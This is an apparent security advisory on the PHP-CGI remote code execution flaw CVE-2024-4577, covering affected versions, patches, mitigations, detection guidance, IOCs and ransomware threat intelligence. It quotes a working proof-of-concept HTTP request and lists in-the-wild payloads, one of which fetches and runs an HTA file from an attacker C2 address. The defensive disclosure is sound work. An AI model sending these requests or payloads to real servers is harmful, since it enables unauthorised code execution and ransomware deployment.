Critical Vulnerability in PHP-CGI (CVE-2024-4577)

Executive Summary

On June 6^th, cybersecurity firm Devcore published an advisory detailing a critical bug in the widely used web framework PHP-CGI. Successful exploitation of this vulnerability allows a remote attacker without credentials to perform remote code execution (RCE) on a targeted machine.

Devcore found the vulnerability through their own research and reported on it here. Their testing discovered the bug in Windows-based PHP systems using Japanese and Chinese character sets. Although the vulnerability was not verified in other language locales, it should be assumed to affect all systems that use PHP-CGI. A day after the initial disclosure, another cybersecurity firm Watchtowr studied the vulnerability and published enough details for readers to develop proof-of-concept (PoC) exploits. Financially motivated threat actors wasted no time, and on June 10^th cybersecurity firm Imperva reported observing threat actor group TellYouThePass using this vulnerability to deploy their ransomware. We expect the volume of attacks to sharply increase in the coming days.

Given the ease of this attack, the severity of a successful exploit, and the reports of current use by ransomware threat actors, Lodestone believes immediate update of affected systems is crucial.

Affected Systems / Products

The vulnerability affects the following PHP versions:

• PHP 8.3 < 8.3.8
• PHP 8.2 < 8.2.20
• PHP 8.1 < 8.1.29

Patches

Devcore worked closely with the PHP organization, who released patches at the time of disclosure here.

Mitigations / Workarounds

Devcore detailed some mitigation steps in their advisory but cautioned that they were only verified to work in specific environments.

Environments supporting Traditional Chinese, Simplified Chinese, and Japanese locales

Apply the following configuration:

RewriteEngine On

RewriteCond %{QUERY_STRING} ^%ad [NC]

RewriteRule .? – [F,L]

Environments using XAMPP for Windows

If you do not need PHP CGI in XAMPP, you can disable it by locating the file:

C:/xampp/apache/conf/extra/httpd-xampp.conf

And commenting out the following line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

Technical Details

The most comprehensive writeup of the technical details behind this vulnerability can be found in the Watchtowr advisory. In short, the bug is due to a “best fit” mapping when translating text from one language to another. In this case, the problem occurs during the translation of a “soft hyphen” (represented digitally by the code 0xAD) to a “real hyphen” (represented digitally by the code 0x2D).

Normally, the hyphen character is used by PHP to pass execution arguments, so most PHP processes will handle this character in a secure way known as “escaping”. However, in this case, there is an inconsistency where the main PHP process does escape a soft hyphen, but the PHP CGI process does not. This inconsistency is what allows attackers to insert arbitrary commands into remote, unauthenticated web requests.

The example proof of concept (PoC) provided by the Watchtowr team is as follows:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1

Host: {{host}}

User-Agent: curl/8.3.0

Accept: */*

Content-Length: 23

Content-Type: application/x-www-form-urlencoded

Connection: keep-alive

<?php

phpinfo();

?>

Detection Guidance

Fortunately, the soft-hyphen character causing this vulnerability is not often used in this way and should be easy to search for in network and system logs.

We recommend threat hunts and detection signatures based on web server requests containing the characters: 0xAD or %AD.

Any requests that contain the 0xAD character in the URI are suspicious, and the attempted executed payload commands will likely be found in the POST data. The following payloads have been reported in the wild:

• <?php phpinfo(); ?>
• <?php system(“mshta hxxp://88.218.76[.]13/dd3.hta”); ?>

The following IOCs were provided in the Imperva report:

• URL : hxxp:/88.218.76[.]13/dd3.hta
• C2 IP : 88.218.76[.]13
• Hash (HTA sample): 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3
• Hash (HTA sample): 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
• Hash (.NET binary): 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53

Threat Intelligence

As mentioned, Imperva has observed the threat actor group TellYouThePass using this vulnerability to infiltrate vulnerable networks and deploy ransomware. TellYouThePass was first spotted in 2019, and while they are not as pervasive as other ransomware families, they are still known to refresh their ransomware tools (upgrading their locker from .NET to Golang) and use exploits quickly after disclosure (such as the recent log4j and ActiveMQ exploits).

They will certainly not be the only group to use this attack, as the low complexity of the attack will lead to many groups developing their own weaponized exploits soon.

How Lodestone is Responding

Lodestone is monitoring client perimeter devices discovered by Karma to identify potentially impacted devices and support organizations in remediation of any issues found.

Sources

• https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/?ref=labs.watchtowr.com
• https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
• https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/